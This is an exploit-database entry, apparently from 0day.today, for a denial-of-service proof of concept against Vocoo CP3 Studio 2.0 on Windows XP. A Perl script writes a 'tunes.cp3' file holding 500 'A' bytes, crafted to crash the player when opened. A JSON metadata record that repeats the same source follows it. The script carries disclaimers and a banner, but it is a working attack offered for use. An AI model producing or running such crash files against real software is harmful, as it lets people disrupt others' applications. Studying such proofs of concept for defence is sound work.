ID 1337DAY-ID-12673 Type zdt Reporter chap0 Modified 2010-06-12T00:00:00
Description
Exploit for windows platform in category dos / poc
====================================
CP3 Studio PC Ver. Denial of Service
====================================
# Exploit Title : CP3 Studio PC Ver. Dos
# Date : June 12, 2010
# Author : chap0 - [www.seek-truth.net]
# Link : http://www.vocooo.com
# Version : 2.0
# Tested on : Windows XP SP3 En
# Greetz to : Corelan Security Team
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-051
#
# Script provided \'as is\', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code :
#!/usr/bin/perl
print \"|------------------------------------------------------------------|\\n\";
print \"| __ __ |\\n\";
print \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";
print \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";
print \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";
print \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";
print \"| |\\n\";
print \"| http://www.corelan.be:8800 |\\n\";
print \"| |\\n\";
print \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";
print \"[+] Vocoo CP3 Studio 2.0 Dos. . .\\n\\n\";
sleep(2);
my $play = \"tunes.cp3\";
my $buffer = \"\\x41\" x 500;
open(FILE,\">$play\");
print FILE $buffer;
close(FILE);
print \"[+] Music Provided by chap0 visit www.corelan.be:8800\\n\";
# 0day.today [2018-04-07] #
{"published": "2010-06-12T00:00:00", "id": "1337DAY-ID-12673", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for windows platform in category dos / poc", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-04-07T23:48:56", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-07T23:48:56", "rev": 2}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-04-07T23:48:56", "edition": 2, "title": "CP3 Studio PC Ver. Denial of Service", "href": "https://0day.today/exploit/description/12673", "modified": "2010-06-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/12673", "references": [], "reporter": "chap0", "sourceData": "====================================\r\nCP3 Studio PC Ver. Denial of Service\r\n====================================\r\n\r\n\r\n# Exploit Title : CP3 Studio PC Ver. Dos\r\n# Date : June 12, 2010\r\n# Author : chap0 - [www.seek-truth.net]\r\n# Link : http://www.vocooo.com\r\n# Version : 2.0\r\n# Tested on : Windows XP SP3 En\r\n# Greetz to : Corelan Security Team\r\n# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-051\r\n#\r\n# Script provided \\'as is\\', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. \r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n# Code :\r\n#!/usr/bin/perl\r\nprint \\\"|------------------------------------------------------------------|\\\\n\\\";\r\nprint \\\"| __ __ |\\\\n\\\";\r\nprint \\\"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\\\n\\\";\r\nprint \\\"| / ___/ __ \\\\\\\\/ ___/ _ \\\\\\\\/ / __ `/ __ \\\\\\\\ / __/ _ \\\\\\\\/ __ `/ __ `__ \\\\\\\\ |\\\\n\\\";\r\nprint \\\"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\\\n\\\";\r\nprint \\\"| \\\\\\\\___/\\\\\\\\____/_/ \\\\\\\\___/_/\\\\\\\\__,_/_/ /_/ \\\\\\\\__/\\\\\\\\___/\\\\\\\\__,_/_/ /_/ /_/ |\\\\n\\\";\r\nprint \\\"| |\\\\n\\\";\r\nprint \\\"| http://www.corelan.be:8800 |\\\\n\\\";\r\nprint \\\"| |\\\\n\\\";\r\nprint \\\"|-------------------------------------------------[ EIP Hunters ]--|\\\\n\\\\n\\\";\r\nprint \\\"[+] Vocoo CP3 Studio 2.0 Dos. . .\\\\n\\\\n\\\";\r\nsleep(2);\r\nmy $play = \\\"tunes.cp3\\\";\r\n \r\nmy $buffer = \\\"\\\\x41\\\" x 500;\r\n \r\nopen(FILE,\\\">$play\\\");\r\nprint FILE $buffer;\r\nclose(FILE);\r\n \r\nprint \\\"[+] Music Provided by chap0 visit www.corelan.be:8800\\\\n\\\";\r\n\r\n\n\n# 0day.today [2018-04-07] #"}